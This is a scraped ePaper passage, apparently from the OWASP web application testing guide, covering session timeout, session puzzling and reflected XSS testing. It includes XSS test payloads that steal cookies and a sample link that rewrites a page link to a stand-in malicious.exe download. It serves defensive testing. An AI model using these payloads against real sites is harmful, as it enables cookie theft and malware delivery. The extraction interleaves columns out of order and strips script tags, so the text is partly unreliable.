1BO4r2U

Recommendations

Info

93 94 Web Application Penetration Testing Web Application Penetration Testing Result Expected: No data that should be visible only by authenticated users should be visible on the examined pages while performing the tests. Ideally the application redirects to a public area or a log in form while accessing authenticated areas after termination of the session. It should be not necessary for the security of the application, but setting session cookies to new values after log out is generally considered as good practice. Testing for session timeout: Try to determine a session timeout by performing requests to a page in the authenticated area of the web application with increasing delays. If the log out behavior appears, the used delay matches approximately the session timeout value. Result Expected: The same results as for server-side session termination testing described before are excepted by a log out caused by an inactivity timeout. The proper value for the session timeout depends on the purpose of the application and should be a balance of security and usability. In a banking applications it makes no sense to keep an inactive session more than 15 minutes. On the other side a short timeout in a wiki or forum could annoy users which are typing lengthy articles with unnecessary log in requests. There timeouts of an hour and more can be acceptable. Testing for session termination in single sign-on environments (single sign-off): Perform a log out in the tested application. Verify if there is a central portal or application directory which allows the user to log back in to the application without authentication. Test if the application requests the user to authenticate, if the URL of an entry point to the application is requested. While logged in in the tested application, perform a log out in the SSO system. Then try to access an authenticated area of the tested application. Result Expected: It is expected that the invocation of a log out function in a web application connected to a SSO system or in the SSO system itself causes global termination of all sessions. An authentication of the user should be required to gain access to the application after log out in the SSO system and connected application. active in case there is no activity by the user, closing and invalidating the session upon the defined idle period since the last HTTP request received by the web application for a given session ID. The most appropriate timeout should be a balance between security (shorter timeout) and usability (longer timeout) and heavily depends on the sensitivity level of the data handled by the application. For example, a 60 minute log out time for a public forum can be acceptable, but such a long time would be too much in a home banking application (where a maximum timeout of 15 minutes is recommended). In any case, any application that does not enforce a timeout-based log out should be considered not secure, unless such behavior is required by a specific functional requirement. The idle timeout limits the chances that an attacker has to guess and use a valid session ID from another user, and under certain circumstances could protect public computers from session reuse. However, if the attacker is able to hijack a given session, the idle timeout does not limit the attacker’s actions, as he can generate activity on the session periodically to keep the session active for longer periods of time. Session timeout management and expiration must be enforced server-side. If some data under the control of the client is used to enforce the session timeout, for example using cookie values or other client parameters to track time references (e.g. number of minutes since log in time), an attacker could manipulate these to extend the session duration. So the application has to track the inactivity time on the server side and, after the timeout is expired, automatically invalidate the current user’s session and delete every data stored on the client. Both actions must be implemented carefully, in order to avoid introducing weaknesses that could be exploited by an attacker to gain unauthorized access if the user forgot to log out from the application. More specifically, as for the log out function, it is important to ensure that all session tokens (e.g. cookies) are properly destroyed or made unusable, and that proper controls are enforced at the server side to prevent the reuse of session tokens. If such actions are not properly carried out, an attacker could replay these session tokens in order to “resurrect” the session of a legitimate user and impersonate him/her (this attack is usually known as ‘cookie replay’). Of course, a mitigating factor is that the attacker needs to be able to access those tokens (which are stored on the victim’s PC), but, in a variety of cases, this may not be impossible or particularly difficult. Then, if the timeout is configured, testers need to understand whether the timeout is enforced by the client or by the server (or both). If the session cookie is non-persistent (or, more in general, the session cookie does not store any data about the time), testers can assume that the timeout is enforced by the server. If the session cookie contains some time related data (e.g., log in time, or last access time, or expiration date for a persistent cookie), then it’s possible that the client is involved in the timeout enforcing. In this case, testers could try to modify the cookie (if it’s not cryptographically protected) and see what happens to the session. For instance, testers can set the cookie expiration date far in the future and see whether the session can be prolonged. As a general rule, everything should be checked server-side and it should not be possible, by re-setting the session cookies to previous values, to access the application again. Gray Box Testing The tester needs to check that: • The log out function effectively destroys all session token, or at least renders them unusable, • The server performs proper checks on the session state, disallowing an attacker to replay previously destroyed session identifiers • A timeout is enforced and it is properly enforced by the server. If the server uses an expiration time that is read from a session token that is sent by the client (but this is not advisable), then the token must be cryptographically protected from tampering. Note that the most important thing is for the application to invalidate the session on the server side. Generally this means that the code must invoke the appropriate methods, e.g. HttpSession. invalidate() in Java and Session.abandon() in .NET. Clearing the cookies from the browser is advisable, but is not strictly necessary, since if the session is properly invalidated on the server, having the cookie in the browser will not help an attacker. References OWASP Resources • Session Management Cheat Sheet This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another. For example, an attacker could use session variable overloading to bypass authentication enforcement mechanisms of applications that enforce authentication by validating the existence of session variables that contain identity–related values, which are usually stored in the session after a successful authentication process. This means an attacker first accesses a location in the application that sets session context and then accesses privileged locations that examine this context. For example - an authentication bypass attack vector could be executed by accessing a publicly accessible entry point (e.g. a password recovery page) that populates the session with an identical session variable, based on fixed values or on user originating input. How to Test Black Box Testing This vulnerability can be detected and exploited by enumerating all of the session variables used by the application and in which context they are valid. In particular this is possible by accessing a sequence of entry points and then examining exit points. In case of black box testing this procedure is difficult and requires some luck since every different sequence could lead to a different result. Examples A very simple example could be the password reset functionality that, in the entry point, could request the user to provide some identifying information such as the username or the e-mail address. This page might then populate the session with these identifying values, which are received directly from the client side, or obtained from queries or calculations based on the received input. At this point there may be some pages in the application that show private data based on this session object. In this manner the attacker could bypass the authentication process. Gray Box testing The most effective way to detect these vulnerabilities is via a source code review. Tools • “Burp Suite - Repeater” - http:/portswigger.net/burp/repeater.html References Whitepapers • “The FormsAuthentication.SignOut method does not prevent cookie reply attacks in ASP.NET applications” - http:/support.microsoft.com/ default.aspx?scid=kb;en-us;900111 Test Session Timeout (OTG-SESS-007) Summary In this phase testers check that the application automatically logs out a user when that user has been idle for a certain amount of time, ensuring that it is not possible to “reuse” the same session and that no sensitive data remains stored in the browser cache. All applications should implement an idle or inactivity timeout for sessions. This timeout defines the amount of time a session will remain The most common scenario for this kind of attack is a public computer that is used to access some private information (e.g., web mail, online bank account). If the user moves away from the computer without explicitly logging out and the session timeout is not implemented on the application, then an attacker could access to the same account by simply pressing the “back” button of the browser. How to Test Black Box testing The same approach seen in the Testing for logout functionality (OTG- SESS-006) section can be applied when measuring the timeout log out. The testing methodology is very similar. First, testers have to check whether a timeout exists, for instance, by logging in and waiting for the timeout log out to be triggered. As in the log out function, after the timeout has passed, all session tokens should be destroyed or be unusable. Testing for Session puzzling (OTG-SESS-008) Summary Session Variable Overloading (also known as Session Puzzling) is an application level vulnerability which can enable an attacker to perform a variety of malicious actions, including by not limited to: • Bypass efficient authentication enforcement mechanisms, and impersonate legitimate users. • Elevate the privileges of a malicious user account, in an environment that would otherwise be considered foolproof. • Skip over qualifying phases in multi-phase processes, even if the process includes all the commonly recommended code level restrictions. • Manipulate server-side values in indirect methods that cannot be predicted or detected. • Execute traditional attacks in locations that were previously unreachable, or even considered secure. References Whitepapers • Session Puzzles: http:/puzzlemall.googlecode.com/files/Session%20Puzzles%20-%20Indirect%20Application%20Attack%20Vectors%20-%20May%202011%20-%20Whitepaper.pdf • Session Puzzling and Session Race Conditions: http:/sectooladdict. blogspot.com/2011/09/session-puzzling-and-session-race.html Remediation Session variables should only be used for a single consistent purpose. Input Validation Testing The most common web application security weakness is the failure to properly validate input coming from the client or from the environment before using it. This weakness leads to almost all of the major vulnerabilities in web applications, such as cross site scripting, SQL injection, interpreter injection, locale/Unicode attacks, file system attacks, and buffer overflows.
95 96 Web Application Penetration Testing Web Application Penetration Testing Data from an external entity or client should never be trusted, since it can be arbitrarily tampered with by an attacker. “All Input is Evil”, says Michael Howard in his famous book “Writing Secure Code”. That is rule number one. Unfortunately, complex applications often have a large number of entry points, which makes it difficult for a developer to enforce this rule. This chapter describes Data Validation testing. This is the task of testing all the possible forms of input to understand if the application sufficiently validates input data before using it. Testing for Reflected Cross site scripting (OTG-INPVAL-001) Summary Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim. Reflected XSS are the most frequent type of XSS attacks found in the wild. Reflected XSS attacks are also known as non-persistent XSS attacks and, since the attack payload is delivered and executed via a single request and response, they are also referred to as first-order or type 1 XSS. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client. The common modus operandi of the attack includes a design step, in which the attacker creates and tests an offending URI, a social engineering step, in which she convinces her victims to load this URI on their browsers, and the eventual execution of the offending code using the victim’s browser. Commonly the attacker’s code is written in the Javascript language, but other scripting languages are also used, e.g., ActionScript and VBScript. Attackers typically leverage these vulnerabilities to install key loggers, steal victim cookies, perform clipboard theft, and change the content of the page (e.g., download links). One of the primary difficulties in preventing XSS vulnerabilities is proper character encoding. In some cases, the web server or the web application could not be filtering some encodings of characters, so, for example, the web application might filter out “”, but might not filter %3cscript%3e which simply includes another encoding of tags. How to Test Black Box testing A black-box test will include at least three phases: detect an XSS vulnerability, the tester will typically use specially crafted input data with each input vector. Such input data is typically harmless, but trigger responses from the web browser that manifests the vulnerability. Testing data can be generated by using a web application fuzzer, an automated predefined list of known attack strings, or manually. Some example of such input data are the following: alert(123) “>alert(document.cookie) For a comprehensive list of potential test strings, see the XSS Filter Evasion Cheat Sheet. [3] For each test input attempted in the previous phase, the tester will analyze the result and determine if it represents a vulnerability that has a realistic impact on the web application’s security. This requires examining the resulting web page HTML and searching for the test input. Once found, the tester identifies any special characters that were not properly encoded, replaced, or filtered out. The set of vulnerable unfiltered special characters will depend on the context of that section of HTML. > (greater than) < (less than) & (ampersand) ‘ (apostrophe or single quote) “ (double quote) Ideally all HTML special characters will be replaced with HTML entities. The key HTML entities to identify are: However, a full list of entities is defined by the HTML and XML specifications. Wikipedia has a complete reference [1]. \n (new line) \r (carriage return) \’ (apostrophe or single quote) \” (double quote) \\ (backslash) \uXXXX (unicode values) The tester must suspect that every data entry point can result in an XSS attack. To analyze it, the tester will play with the user variable and try to trigger the vulnerability. Let’s try to click on the following link and see what happens: http:/example.com/index.php?user=alert(123) If no sanitization is applied this will result in the following popup: This indicates that there is an XSS vulnerability and it appears that the tester can execute code of his choice in anybody’s browser if he clicks on the tester’s link. Example 2 Let’s try other piece of code (link): http:/example.com/index.php?user=window. onload = function() {var AllLinks=document.getElementsBy- TagName(“a”); AllLinks[0].href = “http:/badexample.com/malicious.exe”; } This produces the following behavior: This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls. Bypass XSS filters Reflected cross-site scripting attacks are prevented as the web application sanitizes input, a web application firewall blocks malicious input, or by mechanisms embedded in modern web browsers. The tester must test for vulnerabilities assuming that web browsers will not prevent the attack. Browsers may be out of date, or have built-in security features disabled. Similarly, web application firewalls are not guaranteed to recognize novel, unknown attacks. An attacker could craft an attack string that is unrecognized by the web application firewall. Thus, the majority of XSS prevention must depend on the web application’s sanitization of untrusted user input. There are several mechanisms available to developers for sanitization, such as returning an error, removing, encoding, or replacing invalid input. The means by which the application detects and corrects invalid input is another primary weakness in preventing XSS. A blacklist may not include all possible attack strings, a whitelist may be overly permissive, the sanitization could fail, or a type of input may be incorrectly trusted and remain unsanitized. All of these allow attackers to circumvent XSS filters. The XSS Filter Evasion Cheat Sheet documents common filter evasion tests. Example 3: Tag Attribute Value Since these filters are based on a blacklist, they could not block every type of expressions. In fact, there are cases in which an XSS exploit can be carried out without the use of tags and even without the use of characters such as “ < > and / that are commonly filtered. For example, the web application could use the user input value to fill an attribute, as shown in the following code: Then an attacker could submit the following code: “ onfocus=”alert(document.cookie) Example 4: Different syntax or encoding In some cases it is possible that signature-based filters can be simply defeated by obfuscating the attack. Typically you can do this through the insertion of unexpected variations in the syntax or in the enconding. These variations are tolerated by browsers as valid HTML when the code is returned, and yet they could also be accepted by the filter. [1] Detect input vectors. For each web page, the tester must determine all the web application’s user-defined variables and how to input them. This includes hidden or non-obvious inputs such as HTTP parameters, POST data, hidden form field values, and predefined radio or selection values. Typically in-browser HTML editors or web proxies are used to view these hidden variables. See the example below. [2] Analyze each input vector to detect potential vulnerabilities. To Within the context of an HTML action or JavaScript code, a different set of special characters will need to be escaped, encoded, replaced, or filtered out. These characters include: For a more complete reference, see the Mozilla JavaScript guide. [2] Example 1 For example, consider a site that has a welcome notice “ Welcome %username% “ and a download link. Following some examples: “>alert(document.cookie) “>alert(document.cookie)
Page 1 and 2: 1 2 THE ICONS BELOW REPRESENT WHAT
Page 3 and 4: 3 4 Testing Guide Frontispiece Test
Page 5 and 6: 7 8 Testing Guide Introduction Test
Page 7 and 8: 11 12 Testing Guide Introduction Te
Page 9 and 10: 15 16 Testing Guide Introduction Te
Page 11 and 12: 19 20 Testing Guide Introduction of
Page 13 and 14: 23 24 Web Application Penetration T
Page 47: 91 92 Web Application Penetration T
Page 51 and 52: 99 100 Web Application Penetration
Page 99 and 100:
195 196 Web Application Penetration
Page 101 and 102:
Page 103 and 104:
Page 105 and 106:
Page 107 and 108:
211 212 Reporting Appendix Test ID
Page 109 and 110:
215 216 Appendix Appendix Testing -
Page 111:
219 220 LDAP Injection For details
show all

1BO4r2U

Create successful ePaper yourself

Delete template?

Save as template?